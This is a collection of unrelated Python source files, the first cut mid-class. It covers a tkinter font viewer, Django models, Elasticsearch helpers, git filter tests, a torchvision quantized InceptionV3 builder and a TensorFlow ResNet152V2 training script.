            # column-first layout with a fixed number of rows:
            rb.grid(row=i % self.MAX_ROWS, column=i // self.MAX_ROWS, sticky="w")
            # row-first layout with a fixed number of columns:
            # rb.grid(row=i // self.MAX_COLUMN, column=i % self.MAX_COLUMN, sticky="w")

    def font_list_from_dir(self):
        """
        3. List the fonts folder contents using Pillow's truetype loader.
        """
        import glob, os
        from PIL import ImageFont
        # Locate the Windows font folder.
        windir = os.environ.get("WINDIR")
        files = glob.glob(windir + r"\fonts\*")
        for i, file in enumerate(files):
            basename = os.path.basename(file)
            try:
                img_font = ImageFont.truetype(file, 24)
            except:
                # Skip files Pillow cannot handle.
                # NOTE(review): bare except also swallows KeyboardInterrupt;
                # prefer `except Exception`.
                # print(f"path:{basename}")
                pass
            else:
                font_name = img_font.getname()[0]
                font_ = tkinter.font.Font(self.root, family=font_name, weight="bold")
                # getname() garbles Japanese family names, so use the actual
                # family reported by tk instead.
                font_name = font_.actual("family")
                # One row per font: name, file name, sample text, and the name
                # rendered in its own font.
                tk.Label(self.frame, text=font_name).grid(row=i, column=1, sticky="w")
                tk.Label(self.frame, text=basename, bg="yellow").grid(row=i, column=2, sticky="w")
                tk.Label(self.frame, text=self.text,
                         font=(font_name, self.FONT_SIZE)).grid(row=i, column=3, sticky="w")
                tk.Label(self.frame, text=font_name,
                         font=(font_name, self.FONT_SIZE)).grid(row=i, column=4, sticky="w")
if __name__ == '__main__':
    """
    1:familiesを対象、ラベルで実装。
    2:familiesを対象、ラジオボタンで実装。ScrolledFrameを使用
    3:pillowのtruetypeで実装。fontsフォルダを対象。
    """
    # Select implementation 1-3 (see the string above).
    switch = 2
    text_ = input("\n表示したい文字を入力してください(何も入力しなければ「sample サンプル」と出ます)\n >")
    font_size = input("フォントサイズを入力してください(何も入力しなければ「14ポイント」で出力します)\n >")
    # Only forward arguments the user actually supplied.
    kwargs = {}
    if text_: kwargs["text"] = text_
    if font_size: kwargs["font_size"] = int(font_size)
    a = FontLib(**kwargs)
    if switch == 1:
        # a.root.state("zoomed")  # maximize the window
        a.font_list_by_label()
    elif switch == 2:
        # a.root.state("zoomed")  # maximize the window
        a.font_list_radiobutton()
    elif switch == 3:
        a.font_list_from_dir()
    else:
        print("選択間違い")
        sys.exit()
    a.root.mainloop()
|
import discord
import pytest
import discord.ext.test as dpytest
@pytest.mark.asyncio
async def test_message(bot):
    """Sending a plain text message to the first channel must not raise."""
    target_channel = bot.guilds[0].text_channels[0]
    await target_channel.send("Test Message")
@pytest.mark.asyncio
async def test_embed(bot):
    """Sending an embed with one field to the first channel must not raise."""
    target_channel = bot.guilds[0].text_channels[0]
    embed = discord.Embed(title="Test Embed")
    embed.add_field(name="Field 1", value="Lorem ipsum")
    await target_channel.send(embed=embed)
|
from django.db import models
from django.contrib.auth.models import (
AbstractBaseUser, BaseUserManager
)
import datetime
"""
CITIES AND COUNTRIES
1. cities = > name country longitude latitude
2. countries = > name iso1 iso2 phone currency
"""
class Country(models.Model):
    # A country; referenced by City and Account below.
    name = models.CharField(max_length=255, null=False, blank=False)
    currency = models.CharField(max_length=50, null=True, blank=True)
    lang = models.CharField(max_length=50, null=True, blank=True)
    class Meta:
        # Avoids Django's default pluralization "Countrys" in the admin.
        verbose_name_plural = 'Countries'
    def __str__(self):
        return self.name
class City(models.Model):
    # A city belonging to exactly one Country.
    name = models.CharField(max_length=255, null=False, blank=False)
    country = models.ForeignKey(Country, on_delete=models.CASCADE)
    class Meta:
        # Avoids Django's default pluralization "Citys" in the admin.
        verbose_name_plural = 'Cities'
    def __str__(self):
        return self.name
class Request_Category(models.Model):
    # Lookup table of categories a Request can be filed under.
    name = models.CharField(max_length=255, null=False, blank=False)
    class Meta:
        verbose_name_plural = 'Request Categories'
    def __str__(self):
        return self.name
"""
USER MODEL AND USER MANAGER
1.before any migrations comment two lines
'admin/' link from main url
'django.contrib.admin', from Installed apps in main settings
"""
class UserManager(BaseUserManager):
    """Manager providing email-keyed creation helpers for Account."""

    def create_user(self, email, password=None):
        """Create and persist a regular user identified by *email*."""
        if not email:
            raise ValueError('Users must have an email address')
        account = self.model(email=self.normalize_email(email))
        account.set_password(password)
        account.save(using=self._db)
        return account

    def create_staffuser(self, email, password):
        """Create and persist a user flagged as staff (non-superuser)."""
        account = self.create_user(email, password=password)
        account.is_staff = True
        account.save(using=self._db)
        return account

    def create_superuser(self, email, password):
        """Create and persist a user flagged as both staff and admin."""
        account = self.create_user(email, password=password)
        account.is_staff = True
        account.is_admin = True
        account.save(using=self._db)
        return account
class Account(AbstractBaseUser):
    """
    Custom user model: authenticates by email; carries profile, contact,
    location and activity counters.
    """
    # Filled automatically from the uploaded image via height_field/width_field.
    # BUGFIX: defaults were the *string* "150" on integer fields; use ints.
    image_height = models.PositiveIntegerField(null=True, blank=True, editable=False, default=150)
    image_width = models.PositiveIntegerField(null=True, blank=True, editable=False, default=150)
    full_name = models.CharField(max_length=255)
    profile = models.ImageField(
        upload_to='images/profiles/',
        height_field='image_height', width_field='image_width',
        default='images/profiles/user-blank-image.png',
        help_text="Profile Picture", verbose_name="Profile Picture"
    )
    code = models.CharField(max_length=255, null=True, blank=True)
    about = models.TextField(null=True, blank=True)
    email = models.EmailField(
        verbose_name='email address',
        max_length=255,
        unique=True,
    )
    # Contact / social handles (all optional).
    phone = models.CharField(max_length=255, unique=True, blank=True, null=True)
    whatsapp = models.CharField(max_length=255, blank=True, null=True)
    facebook = models.CharField(max_length=255, blank=True, null=True)
    instagram = models.CharField(max_length=255, blank=True, null=True)
    address = models.TextField(blank=True, null=True)
    country = models.ForeignKey(Country, on_delete=models.SET_NULL, blank=True, null=True)
    city = models.ForeignKey(City, on_delete=models.SET_NULL, blank=True, null=True)
    # Activity counters.
    points = models.IntegerField(default=0, blank=True, null=True)
    requests = models.IntegerField(default=0, blank=True, null=True)
    responses = models.IntegerField(default=0, blank=True, null=True)
    hearts = models.IntegerField(default=0, blank=True, null=True)
    subscribers = models.IntegerField(default=0, blank=True, null=True)
    is_active = models.BooleanField(default=True)
    is_staff = models.BooleanField(default=False)  # an admin user; non super-user
    is_admin = models.BooleanField(default=False)  # a superuser
    created = models.DateTimeField(auto_now_add=True, auto_now=False)
    updated = models.DateTimeField(auto_now=True, auto_now_add=False)
    objects = UserManager()
    USERNAME_FIELD = 'email'
    REQUIRED_FIELDS = []  # Email & Password are required by default.

    def get_full_name(self):
        # The user is identified by their email address.
        return self.email

    def __unicode__(self):
        # NOTE(review): returns the profile image, unlike __str__ which
        # returns the email — looks inconsistent; confirm before changing.
        return "{0}".format(self.profile)

    def get_short_name(self):
        # The user is identified by their email address.
        return self.email

    def __str__(self):  # __unicode__ on Python 2
        return self.email

    def has_perm(self, perm, obj=None):
        # Admins hold every permission.
        return self.is_admin

    def has_module_perms(self, app_label):
        # All users may view all app modules.
        return True
"""
REQUEST, RESPONSE AND QUEUE MODELS AND MANAGERS
"""
class Request_Status(models.Model):
    # Lookup table of states a Request can be in.
    name = models.CharField(max_length=50, null=False, blank=False)
    class Meta:
        verbose_name_plural = 'Request Status'
    def __str__(self):
        return self.name
class Request(models.Model):
    # A help/supply request posted by a user at a given address.
    desc = models.TextField(null=False, blank=False)
    request_category = models.ForeignKey(Request_Category, on_delete=models.DO_NOTHING)
    address = models.CharField(max_length=255, null=False, blank=False)
    city = models.ForeignKey(City, on_delete=models.DO_NOTHING)
    country = models.ForeignKey(Country, on_delete=models.DO_NOTHING, null=True, blank=True)
    # True when the poster is offering supply rather than requesting it.
    # NOTE(review): inferred from the field name — confirm against views.
    supply = models.BooleanField(default=False)
    user = models.ForeignKey(Account, on_delete=models.DO_NOTHING, null=True, blank=True)
    # Lifecycle flags.
    accepted = models.BooleanField(default=False)
    delivered = models.BooleanField(default=False)
    active = models.BooleanField(default=True)
    created = models.DateTimeField(auto_now_add=True, auto_now=False)
    updated = models.DateTimeField(auto_now_add=False, auto_now=True)
    class Meta:
        verbose_name_plural = 'Requests'
    def __str__(self):
        return str(self.id)
class Request_Images(models.Model):
    """An image attached to a Request."""
    request = models.ForeignKey(Request, on_delete=models.CASCADE)
    image = models.ImageField(upload_to='images/requests/')

    class Meta:
        # BUGFIX: was 'Cities' — copy-paste from the City model.
        verbose_name_plural = 'Request Images'

    def __str__(self):
        # BUGFIX: concatenating a str with a Request instance raised
        # TypeError; convert the related request explicitly.
        return self.image.name + ' of ' + str(self.request)
class Response(models.Model):
    # A user's offer/answer to a Request, with a points breakdown.
    request = models.ForeignKey(Request, on_delete=models.CASCADE)
    user = models.ForeignKey(Account, on_delete=models.CASCADE)
    desc = models.TextField(null=True, blank=True)
    # Points split: for the requested item, for shipment, and anything else.
    request_points = models.IntegerField(default=0, null=True, blank=True)
    shipment_points = models.IntegerField(default=0, null=True, blank=True)
    other_points = models.IntegerField(default=0, null=True, blank=True)
    active = models.BooleanField(default=True)
    created = models.DateTimeField(auto_now_add=True, auto_now=False)
    updated = models.DateTimeField(auto_now_add=False, auto_now=True)
    class Meta:
        verbose_name_plural = 'Responses'
    def __str__(self):
        return str(self.id)
class Queue(models.Model):
    # A user queued on a Request (waiting list entry).
    request = models.ForeignKey(Request, on_delete=models.CASCADE)
    user = models.ForeignKey(Account, on_delete=models.CASCADE)
    active = models.BooleanField(default=True)
    created = models.DateTimeField(auto_now=False, auto_now_add=True)
    updated = models.DateTimeField(auto_now=True, auto_now_add=False)
    class Meta:
        verbose_name_plural = 'Queues'
    def __str__(self):
        return str(self.id)
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import json
from os import path
import requests
from settings import ES_HOST as HOST
from settings import INDEX
# (unguarded) singleton for lazy init
MAPPINGS = None
def delete_index(host, index_name):
    """Delete the named ES index; raise on any non-200 response."""
    response = requests.delete(path.join(host, index_name))
    if response.status_code != 200:
        raise Exception(u'index_res: {0} - {1}'.format(response, response.text))
    return response
def create_index(host, index_name, config):
    """
    Create an ES index with the (json) configuration.

    Raises on any non-200 status. CONSISTENCY: now returns the response
    object like delete_index does (previously returned None); callers
    ignoring the return value are unaffected.
    """
    index_res = requests.post(path.join(host, index_name),
                              data=json.dumps(config))
    if not index_res.status_code == 200:
        err = u'index_res: {0} - {1}'.format(index_res, index_res.text)
        raise Exception(err)
    return index_res
def flush_index(host, index_name):
    # POST to the index's _flush endpoint; returns the raw response object.
    return requests.post(path.join(host, index_name, '_flush'))
def get_mappings(host):
    """
    Lazily fetch and cache the mappings for INDEX (module-level singleton).

    BUGFIX: the cache check was `if not MAPPINGS`, which re-fetched on every
    call whenever the mappings were legitimately empty; test for None instead.
    """
    global MAPPINGS
    if MAPPINGS is None:
        maps_url = path.join(host, INDEX, '_mapping')
        res = requests.get(maps_url)
        MAPPINGS = res.json()[INDEX]["mappings"]
    return MAPPINGS
def get_id_path(host, doc_type):
    # Dotted path (e.g. "meta.id") the mapping declares as the _id source.
    return get_mappings(host)[doc_type]["_id"]["path"]
def get_doc_id(host, doc, doc_type):
    """Walk the type's _id path through *doc* and return the value found."""
    node = doc
    for key in get_id_path(host, doc_type).split('.'):
        node = node[key]
    return node
def index_doc(host, index_name, type_name, doc, parent_id=None):
    """
    Index *doc* into the named index/type and return the ES-assigned _id.

    :param doc: a dict (json-encoded here) or a pre-encoded json string
    :param parent_id: optional parent document id for parent/child mappings
    :raises Exception: on any response other than 201 Created
    """
    index_url = path.join(host, index_name, type_name)
    params = {}
    if parent_id:
        params['parent'] = parent_id
    # IDIOM: isinstance instead of `type(doc) is dict` (covers dict subclasses).
    if isinstance(doc, dict):
        doc = json.dumps(doc)
    index_res = requests.post(index_url, data=doc, params=params)
    if not index_res.status_code == 201:
        msg = u'index_url: {0}\n'.format(index_url)
        msg += u'doc: {0}\n'.format(doc)
        msg += u'index_res: {0} - {1}\n'.format(index_res, index_res.text)
        print(msg)
        raise Exception(msg)
    return index_res.json()['_id']
def search(host, index_name, type_name, crit):
    """
    Run a bool/must query built from *crit* (a dict, or arbitrarily nested
    lists of dicts) and return the matching _source documents as a list.
    """
    def build_bool_list(criteria, must=None):
        """
        recursive function to build a must, should, or must_not list in a bool
        """
        if must is None:
            must = []
        # IDIOM: isinstance instead of type() comparisons.
        if isinstance(criteria, dict):
            must.append(criteria)
        elif isinstance(criteria, list):
            for criterion in criteria:
                build_bool_list(criterion, must)
        else:
            raise Exception(u'criteria {0} not list or dict'.format(criteria))
        return must
    search_url = path.join(host, index_name, type_name, '_search') + '?pretty'
    query = {"query": {"bool": {"must": build_bool_list(crit)}}}
    res = requests.post(search_url, data=json.dumps(query))
    if res.status_code != 200:
        print(u'query: {0}'.format(json.dumps(query, indent=2)))
        raise Exception(u'search failure: {0}'.format(res.text))
    # BUGFIX: `map` returns a lazy iterator on Python 3; materialize a list
    # so callers can iterate the result more than once (and json-dump it).
    return [hit['_source'] for hit in res.json()['hits']['hits']]
|
import Core.Projection as core
import numpy as np
def getRaw2D(points, view):
    """Project each point into *view* and return an (N, 2) int64 array."""
    projected = [point.get2d(view) for point in points]
    return np.array([[p.x, p.y] for p in projected], dtype=np.int64)
class AnchorPointsManager:
    """Holds anchor points and notifies a callback whenever they change."""

    def __init__(self, callback):
        self.anchors = []
        self.callback = callback

    def reset(self):
        """Drop all anchors and notify the callback."""
        self.anchors = []
        self.callback()

    def apply(self, slice, coord_1, coord_2):
        """Replace the stored anchors with the 3D point under (coord_1, coord_2)."""
        projected = core.point2d(coord_1, coord_2, slice.view)
        anchor = projected.to3d(slice.slider.getIndex())
        self.reset()
        self.anchors.append(anchor)
        self.callback()

    def getRaw3D(self):
        """Return the anchors as an (N, 3) int64 array."""
        return np.array([[a.x, a.y, a.z] for a in self.anchors], dtype=np.int64)

    def getRaw2D(self, view):
        """Return the anchors projected into *view* as an (N, 2) int64 array."""
        return getRaw2D(self.anchors, view)
|
from compas_ags.diagrams import FormDiagram
from compas_ags.diagrams import ForceDiagram
from compas_igs.rhino import Scene
from compas.rpc import Proxy
import compas_rhino
from compas_igs.utilities import compute_force_drawinglocation
from compas_igs.utilities import compute_force_drawingscale
from compas_igs.utilities import compute_form_forcescale
# Start a fresh RPC proxy to the graph-statics backend.
proxy = Proxy()
proxy.restart_server()
proxy.package = "compas_ags.ags.graphstatics"

# Input form diagram (the force diagram is derived from it below).
formad = '/Users/mricardo/Desktop/form.json'
forcead = '/Users/mricardo/Desktop/force.json'
form = FormDiagram.from_json(formad)
#force = ForceDiagram.from_json(forcead)
#form.dual = force
#force.dual = form

# Register the form in the Rhino scene and rebind to the scene object.
scene = Scene()
form_id = scene.add(form, name='Form', layer='IGS::FormDiagram')
form = scene.find(form_id)

# Build the reciprocal force diagram and update it from the form via RPC.
forcediagram = ForceDiagram.from_formdiagram(form.diagram)
force_id = scene.add(forcediagram, name="Force", layer="IGS::ForceDiagram")
force = scene.find(force_id)
force.diagram.data = proxy.force_update_from_form_proxy(force.diagram.data, form.diagram.data)

# Scale and place the force diagram for drawing next to the form.
force.scale = compute_force_drawingscale(form, force)
force.location = compute_force_drawinglocation(form, force)
form.settings['scale.forces'] = compute_form_forcescale(form)
force.diagram.constraints_from_dual()
scene.update()

# Pause so the user can inspect before constraints are solved.
# BUGFIX: prompt typo fixed ("wite" -> "write").
compas_rhino.rs.GetReal('write a number', 0)
form.diagram.data, force.diagram.data = proxy.update_diagrams_from_constraints_proxy(form.diagram.data, force.diagram.data)
scene.update()
|
from unittest import TestCase
from Interpretator import *
class InterpretatorTest(TestCase):
    """Placeholder test suite for the Interpretator module."""
    def testEmpty(self):
        # Intentionally empty: keeps the suite runnable until real tests exist.
        pass
|
#!/usr/bin/env python
"""
@file coi-services/mi/idk/platform/driver_generator.py
@author Bill French
@brief Generate directory structure and code stubs for a driver
"""
__author__ = 'Bill French'
__license__ = 'Apache 2.0'
import os
import sys
import re
from string import Template
import random
import string
import shutil
from mi.core.log import get_logger ; log = get_logger()
from mi.idk import prompt
from mi.idk.config import Config
from mi.idk.platform.metadata import Metadata
import mi.idk.driver_generator
from mi.idk.exceptions import DriverParameterUndefined
from mi.idk.exceptions import MissingTemplate
class DriverGenerator(mi.idk.driver_generator.DriverGenerator):
    """
    Generate platform driver code, tests and directory structure.

    Specializes the generic IDK driver generator with platform-specific
    paths, templates and template-substitution data.
    """

    ###
    # Configurations
    ###
    def driver_base_dir(self):
        """
        @brief full path to the driver make dir
        @retval driver make path
        @raise DriverParameterUndefined when metadata has no driver_path
        """
        if not self.metadata.driver_path:
            log.info("metadata is %s", self.metadata)
            raise DriverParameterUndefined("driver_path undefined in metadata")
        return os.path.join(Config().base_dir(),
                            "mi", "platform", "driver")

    def driver_dir(self):
        """
        @brief full path to the driver code
        @retval driver path
        @raise DriverParameterUndefined when metadata has no driver_path
        """
        if not self.metadata.driver_path:
            raise DriverParameterUndefined("driver_path undefined in metadata")
        return os.path.join(self.driver_base_dir(), self.metadata.driver_path)

    def template_dir(self):
        """
        @brief path to the driver template dir
        @retval driver test code template path
        """
        return os.path.join(Config().template_dir(), 'platform')

    def driver_name_camelcase(self):
        """
        @brief driver name in CamelCase, e.g. 'foo_bar' -> 'FooBar'
        @retval capitalized driver name with underscores removed
        """
        return string.capwords(self.metadata.driver_name, '_').replace('_', '')

    ###
    # Private Methods
    ###
    def __init__(self, metadata, force=False):
        """
        @brief Constructor
        @param metadata IDK Metadata object
        @param force overwrite existing files when True
        """
        mi.idk.driver_generator.DriverGenerator.__init__(self, metadata, force)
        self.metadata = metadata
        self.force = force

    def _driver_template_data(self):
        """
        @brief dictionary containing a map of substitutions for the driver code generation
        @retval data mapping for driver generation
        """
        return {
            'driver_module': self.driver_modulename(),
            'file': self.driver_relative_path(),
            'author': self.metadata.author,
            'driver_name': self.metadata.driver_name,
            'driver_path': self.metadata.driver_path,
            'release_notes': self.metadata.notes,
            'constructor': self.metadata.constructor,
            'full_instrument_lower': self.metadata.driver_name.lower(),
            'full_instrument_camelcase': self.driver_name_camelcase(),
        }

    def _test_template_data(self):
        """
        @brief dictionary containing a map of substitutions for the driver test code generation
        @retval data mapping for driver test generation
        """
        # CLEANUP: removed an unused 6-char random id that shadowed the
        # builtin `id` and never appeared in the returned mapping.
        return {
            'test_module': self.test_modulename(),
            'driver_module': self.driver_modulename(),
            'driver_dir': self.driver_dir(),
            'file': self.driver_relative_path(),
            'author': self.metadata.author,
            'driver_name': self.metadata.driver_name,
            'constructor': self.metadata.constructor,
            'full_instrument_lower': self.metadata.driver_name.lower(),
            'full_instrument_camelcase': self.driver_name_camelcase(),
        }

    def create_init_files(self):
        """
        @brief touch __init__.py in the test dir and each parent, one level
               per component of '<driver_path>/test'
        """
        path = self.driver_test_dir()
        p = os.path.join(self.metadata.driver_path, 'test')
        # The component value is unused: the loop only counts levels while
        # `path` walks upward via '..'.
        # NOTE(review): split('/') assumes POSIX-style driver_path — confirm.
        for _ in p.split('/'):
            self._touch_init(path)
            path = os.path.join(path, '..')
|
from dexy.exceptions import UserFeedback
from dexy.filters.git import repo_from_path
from dexy.filters.git import repo_from_url
from dexy.filters.git import generate_commit_info
from tests.utils import assert_in_output
from tests.utils import runfilter
from tests.utils import tempdir
from nose.exc import SkipTest
import os
import json
REMOTE_REPO_HTTPS = "https://github.com/ananelson/dexy-templates"
PATH_TO_LOCAL_REPO = os.path.expanduser("~/dev/testrepo")
# TODO use subprocess to check out a repo to a temp dir, or have a repo in data
# dir, or use [gasp] submodules.
# Determine once, at import time, whether these tests can run at all:
# requires pygit2, the local test repo, and internet access.
try:
    import pygit2
    import urllib
    no_local_repo = not os.path.exists(PATH_TO_LOCAL_REPO)
    # NOTE: urllib.urlopen is the Python 2 API (urllib.request.urlopen on Py3).
    try:
        urllib.urlopen("http://google.com")
        no_internet = False
    except IOError:
        no_internet = True
    if no_local_repo:
        SKIP = (True, "No local repo at %s." % PATH_TO_LOCAL_REPO)
    elif no_internet:
        SKIP = (True, "Internet not available.")
    else:
        SKIP = (False, None)
except ImportError:
    SKIP = (True, "pygit2 not installed")
def skip():
    # Raise nose's SkipTest when the module-level SKIP flag says tests
    # cannot run; SKIP[1] carries the human-readable reason.
    if SKIP[0]:
        raise SkipTest(SKIP[1])
# Invoked at import time so the whole module is skipped when unusable.
skip()
def test_run_gitrepo():
    # The repo filter should expand the remote repository into many nodes.
    with runfilter("repo", REMOTE_REPO_HTTPS) as doc:
        assert len(doc.wrapper.nodes) > 20
def test_generate_commit_info():
    # Resolve a reference of the remote repo and verify author metadata.
    # NOTE(review): refs[0] assumes a stable reference ordering — confirm.
    repo, remote = repo_from_url(REMOTE_REPO_HTTPS)
    refs = repo.listall_references()
    ref = repo.lookup_reference(refs[0])
    commit = repo[ref.target]
    commit_info = generate_commit_info(commit)
    assert commit_info['author-name'] == "Ana Nelson"
    assert commit_info['author-email'] == "ana@ananelson.com"
def test_git_commit():
    # gitcommit filter output should expose json patches plus author metadata.
    with runfilter("gitcommit", REMOTE_REPO_HTTPS) as doc:
        output = doc.output_data()
        patches = json.loads(output['patches'])
        assert output['author-name'] == "Ana Nelson"
        assert output['author-email'] == "ana@ananelson.com"
        #assert output['message'] == "Add README file."
        #assert output['hex'] == "2f15837e64a70e4d34b924f6f8c371a266d16845"
def test_git_log():
    # Log of the local repo should contain its known first commit message.
    assert_in_output("gitlog", PATH_TO_LOCAL_REPO,
                     "Add README file.")
def test_git_log_remote():
    # Log of the remote repo should mention a known commit ("Rename").
    assert_in_output("gitlog", REMOTE_REPO_HTTPS,
                     "Rename")
def test_repo_from_url():
    # Cloning by URL should yield an 'origin' remote pointing at the URL.
    repo, remote = repo_from_url(REMOTE_REPO_HTTPS)
    assert remote.name == 'origin'
    assert remote.url == REMOTE_REPO_HTTPS
def test_repo_from_path():
    # Opening the local checkout should resolve to its .git directory.
    repo, remote = repo_from_path(PATH_TO_LOCAL_REPO)
    assert ".git" in repo.path
    #assert isinstance(repo.head, pygit2.Object)
    # assert "README" in repo.head.message
def test_repo_from_invalid_path():
    # A directory that is not a git repo must raise UserFeedback, not succeed.
    with tempdir():
        try:
            repo, remote = repo_from_path(".")
            assert False
        except UserFeedback as e:
            assert "no git repository was found at '.'" in str(e)
def test_run_git():
    # Smoke test: the git filter runs cleanly against the local repo.
    with runfilter("git", PATH_TO_LOCAL_REPO) as doc:
        doc.output_data()
def test_run_git_remote():
    # Smoke test: the git filter runs cleanly against the remote repo.
    with runfilter("git", REMOTE_REPO_HTTPS) as doc:
        doc.output_data()
|
import warnings
from functools import partial
from typing import Any, Optional, Union
from torchvision.transforms.functional import InterpolationMode
from ....models.quantization.inception import (
QuantizableInception3,
_replace_relu,
quantize_model,
)
from ...transforms.presets import ImageNetEval
from .._api import Weights, WeightEntry
from .._meta import _IMAGENET_CATEGORIES
from ..inception import InceptionV3Weights
__all__ = [
"QuantizableInception3",
"QuantizedInceptionV3Weights",
"inception_v3",
]
class QuantizedInceptionV3Weights(Weights):
    # FBGEMM post-training-quantized weights for the TF-ported InceptionV3;
    # metadata links back to the unquantized entry it was derived from.
    ImageNet1K_FBGEMM_TFV1 = WeightEntry(
        url="https://download.pytorch.org/models/quantized/inception_v3_google_fbgemm-71447a44.pth",
        transforms=partial(ImageNetEval, crop_size=299, resize_size=342),
        meta={
            "size": (299, 299),
            "categories": _IMAGENET_CATEGORIES,
            "interpolation": InterpolationMode.BILINEAR,
            "backend": "fbgemm",
            "quantization": "ptq",
            "recipe": "https://github.com/pytorch/vision/tree/main/references/classification#post-training-quantized-models",
            "unquantized": InceptionV3Weights.ImageNet1K_TFV1,
            "acc@1": 77.176,
            "acc@5": 93.354,
        },
    )
def inception_v3(
    weights: Optional[Union[QuantizedInceptionV3Weights, InceptionV3Weights]] = None,
    progress: bool = True,
    quantize: bool = False,
    **kwargs: Any,
) -> QuantizableInception3:
    """Build InceptionV3, optionally quantized and/or with pretrained weights.

    Args:
        weights: pretrained weight entry to load (quantized or float).
        progress: show a download progress bar for the state dict.
        quantize: quantize the model using the weights' backend.
        **kwargs: forwarded to QuantizableInception3; the legacy
            ``pretrained`` flag is accepted but deprecated.
    """
    # Legacy `pretrained=True` maps onto the default weight entries.
    if "pretrained" in kwargs:
        warnings.warn("The argument pretrained is deprecated, please use weights instead.")
        if kwargs.pop("pretrained"):
            weights = (
                QuantizedInceptionV3Weights.ImageNet1K_FBGEMM_TFV1 if quantize else InceptionV3Weights.ImageNet1K_TFV1
            )
        else:
            weights = None
    if quantize:
        weights = QuantizedInceptionV3Weights.verify(weights)
    else:
        weights = InceptionV3Weights.verify(weights)
    # Remember the caller's aux_logits wish: pretrained checkpoints require
    # aux_logits=True during construction, so it is forced on below and the
    # aux head is stripped again afterwards if the caller did not ask for it.
    original_aux_logits = kwargs.get("aux_logits", False)
    if weights is not None:
        if "transform_input" not in kwargs:
            kwargs["transform_input"] = True
        kwargs["aux_logits"] = True
        kwargs["num_classes"] = len(weights.meta["categories"])
        if "backend" in weights.meta:
            kwargs["backend"] = weights.meta["backend"]
    backend = kwargs.pop("backend", "fbgemm")
    model = QuantizableInception3(**kwargs)
    _replace_relu(model)
    if quantize:
        quantize_model(model, backend)
    if weights is not None:
        # For quantized models the aux head must be removed *before* loading;
        # for float models it is removed *after* loading.
        if quantize and not original_aux_logits:
            model.aux_logits = False
            model.AuxLogits = None
        model.load_state_dict(weights.state_dict(progress=progress))
        if not quantize and not original_aux_logits:
            model.aux_logits = False
            model.AuxLogits = None
    return model
|
# TEST GPU SET UP via commands
'''
run commands below:
1. nvcc -V --> nvidia cuda compiler driver
2. nvidia-smi --> about GPU
cudNN version can be found at C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v10.1\include\cudnn.h as below:
#define CUDNN_MAJOR 7
#define CUDNN_MINOR 6
#define CUDNN_PATCHLEVEL 5
'''
# TEST GPU SETUP via tensorflow (notebook-style script: bare expressions
# below are evaluated for their display value and otherwise discarded).
import tensorflow as tf
# check tf version
tf.__version__
# is cuda installed ?
tf.test.is_built_with_cuda()
# test whether GPU is available
tf.test.is_gpu_available(cuda_only=False, min_cuda_compute_capability=None)
# physical_device name
tf.config.list_physical_devices('GPU')
# number of GPU's available
len(tf.config.experimental.list_physical_devices('GPU'))
# code to confirm tensorflow is using GPU
tf.config.experimental.list_physical_devices('GPU')
# CONFIG GPU (TF1-compat session config)
from tensorflow._api.v2.compat.v1 import ConfigProto
from tensorflow._api.v2.compat.v1 import InteractiveSession
# avoid using 100% of GPU, else GPU overclock.
config = ConfigProto()
# use 50% of the GPU memory
config.gpu_options.per_process_gpu_memory_fraction = 0.5
config.gpu_options.allow_growth = True
session = InteractiveSession(config=config)
# BEGIN THE PROGRAM
# import the lib's
from tensorflow.keras.layers import Dense, Flatten
from tensorflow.keras.models import Model
from tensorflow.keras.applications import ResNet152V2
from tensorflow.keras.applications.resnet50 import preprocess_input
from glob import glob
# re-size all the images to this
IMAGE_SIZE = [224, 224]
train_path = 'dataset/train'
valid_path = 'dataset/test'
# use imagenet weights i,e download weight file from https://storage.googleapis.com/tensorflow/keras-applications/resnet/resnet152v2_weights_tf_dim_ordering_tf_kernels_notop.h5
resnet = ResNet152V2(input_shape=IMAGE_SIZE + [3], weights='imagenet', include_top=False)
# freeze the pretrained backbone: do not train existing weights
for layer in resnet.layers:
    layer.trainable = False
# get no of output classes (one subdirectory per class; only len() is used)
total_no_of_classes = glob('dataset/train/*')
# flatten the backbone output and add the classification head
x = Flatten()(resnet.output)
output_layer = Dense(len(total_no_of_classes), activation='softmax')(x)
# create object for the model
resnet_model = Model(inputs=resnet.input, outputs=output_layer)
# show model architecture
resnet_model.summary()
# inform model about cost and optimization method to use
resnet_model.compile(
    loss='categorical_crossentropy',
    optimizer='adam',
    metrics=['accuracy'])
# utilize 'Image Data Generator' for importing images from the dataset
from tensorflow.keras.preprocessing.image import ImageDataGenerator
# augmentation on the training split only; both splits are rescaled to [0, 1]
train_datagen = ImageDataGenerator(rescale = 1./255,
                                   shear_range = 0.2,
                                   zoom_range = 0.2,
                                   horizontal_flip = True)
test_datagen = ImageDataGenerator(rescale = 1./255)
# give same target size as input size for the images
training_set = train_datagen.flow_from_directory('dataset/train',
                                                 target_size = (224, 224),
                                                 batch_size = 32,
                                                 class_mode = 'categorical')
test_set = test_datagen.flow_from_directory('dataset/test',
                                            target_size = (224, 224),
                                            batch_size = 32,
                                            class_mode = 'categorical')
# run the resnet model
result = resnet_model.fit(
    training_set,
    validation_data=test_set,
    epochs=20,
    steps_per_epoch=len(training_set),
    validation_steps=len(test_set)
)
import matplotlib.pyplot as plt
# plot the loss
plt.plot(result.history['loss'], label='train loss')
plt.plot(result.history['val_loss'], label='val loss')
plt.legend()
# BUGFIX: savefig must come before show(); show() clears the current
# figure, so saving afterwards wrote a blank image.
plt.savefig('LossVal_loss_ResNet152V2')
plt.show()
# plot the accuracy
plt.plot(result.history['accuracy'], label='train acc')
plt.plot(result.history['val_accuracy'], label='val acc')
plt.legend()
plt.savefig('AccVal_acc_ResNet152V2')
plt.show()
# save the trained ResNet152V2 model to local disk
resnet_model.save('resnet152V2_model.h5')
# prediction for testset (softmax probabilities per image)
predict_new = resnet_model.predict(test_set)
predict_new
import numpy as np
# take argmax on testset i,e class index for every image
predict_new = np.argmax(predict_new, axis=1)
predict_new
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing import image
# load model from local
model=load_model('resnet152V2_model.h5')
# load new image
new_image = image.load_img('dataset/test/fresh cotton leaf/d (378).jpg',target_size=(224,224))
# convert PIL image type to array
new_image_array = image.img_to_array(new_image)
new_image_array.shape
# normalize to [0, 1], matching the generators' rescale above
new_image_array=new_image_array/255
import numpy as np
# add additional batch dim for input of the NN: (1, 224, 224, 3)
new_image_array=np.expand_dims(new_image_array,axis=0)
# https://stackoverflow.com/questions/47555829/preprocess-input-method-in-keras/47556342
new_image_array_with_new_added_dim =preprocess_input(new_image_array)
